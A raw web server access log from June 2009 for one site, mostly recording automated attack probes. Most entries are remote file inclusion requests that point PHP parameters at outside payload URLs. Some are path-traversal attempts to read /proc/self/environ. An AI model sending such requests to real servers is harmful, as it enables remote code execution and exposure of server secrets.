80.87.37.130 - - [28/Jun/2009:20:46:26 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.87.37.130 - - [28/Jun/2009:20:46:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
140.239.58.70 - - [28/Jun/2009:20:46:30 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.87.37.130 - - [28/Jun/2009:20:46:31 -0700] "GET /phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.87.37.130 - - [28/Jun/2009:20:50:10 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
85.236.43.28 - - [28/Jun/2009:20:58:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.redneckmba.com/" "yacybot (amd64 Linux 2.6.26-2-amd64; java 1.6.0_12; Europe/en) http://yacy.net/bot.html" "www.redneckmba.com"
85.236.43.28 - - [28/Jun/2009:20:58:12 -0700] "GET /blog/ HTTP/1.1" 404 275 "-" "yacybot (amd64 Linux 2.6.26-2-amd64; java 1.6.0_12; Europe/en) http://yacy.net/bot.html" "www.redneckmba.com"
65.55.210.86 - - [28/Jun/2009:21:14:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
65.55.210.86 - - [28/Jun/2009:21:14:47 -0700] "GET /logs/access_090608.log HTTP/1.1" 200 1048576 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:16:59 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:16:59 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:16:59 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:17:17 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:17:17 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:17:17 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:19:03 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:19:03 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:19:03 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
69.175.14.66 - - [28/Jun/2009:21:19:08 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
69.175.14.66 - - [28/Jun/2009:21:19:08 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2090 "-" "libwww-perl/5.825" "www.redneckmba.com"
69.175.14.66 - - [28/Jun/2009:21:19:08 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.825" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:11 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:11 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:12 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:19:12 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:19:12 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:19:12 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:12 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:12 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:13 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:17 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:17 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:17 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:34 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:34 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:34 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:19:51 -0700] "GET /logs/access.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:56 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:56 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:19:56 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:19:58 -0700] "GET /logs/access.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:20:03 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:20:03 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:20:04 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:20:04 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:20:04 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:20:04 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.206 - - [28/Jun/2009:21:21:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:22:27 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:22:33 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:22:39 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:23:05 -0700] "GET /logs/access.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
201.232.54.48 - - [28/Jun/2009:21:24:25 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
201.232.54.48 - - [28/Jun/2009:21:24:25 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.redneckmba.com"
201.232.54.48 - - [28/Jun/2009:21:24:25 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2090 "-" "libwww-perl/5.805" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:21:24:47 -0700] "GET /logs/access.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:43 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:44 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:44 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:21:28:44 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:31:04 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:31:04 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2082 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:31:04 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:31:54 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2082 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:31:54 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:31:54 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [28/Jun/2009:21:32:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:32:34 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:32:34 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:32:34 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2082 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:32:42 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:32:42 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2082 "-" "Mozilla/5.0" "www.redneckmba.com"
70.86.9.234 - - [28/Jun/2009:21:32:42 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [28/Jun/2009:21:33:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
69.175.14.66 - - [28/Jun/2009:21:33:15 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
69.175.14.66 - - [28/Jun/2009:21:33:15 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
69.175.14.66 - - [28/Jun/2009:21:33:15 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:39:02 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:39:03 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:39:03 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:43:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:43:12 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:43:13 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:43:39 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:43:39 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:43:40 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:44:04 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:44:04 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.223.3.98 - - [28/Jun/2009:21:44:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:11 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:12 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:14 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:14 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:14 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:30 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:30 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:31 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:31 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:31 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:31 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:31 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:31 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:21:44:31 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
